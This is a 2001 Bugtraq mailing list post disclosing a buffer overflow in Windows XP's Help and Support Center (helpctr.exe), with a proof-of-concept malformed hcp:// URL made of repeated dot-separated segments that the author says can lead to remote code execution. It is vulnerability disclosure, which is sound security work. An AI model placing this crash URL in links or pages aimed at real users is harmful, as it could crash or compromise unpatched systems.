Bugtraq mailing list archives

Buffer overflow in Windows XP "helpctr.exe"


From: <mozoral () superonline com>
Date: Wed, 21 Nov 2001 16:32:14 +0200


Hi,

I don't know if this has been reported before. I discovered an exploitable buffer overflow vulnerability in 
"helpctr.exe", which can enable an attacker to execute an arbitrary code on remote users with a malformed url.

Example :
"hcp://m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m"
Note : Dots are important do not remove them.

I'm using Windows XP Pro Build 2600

Meliksah Ozoral
mozoral () superonline com



Current thread: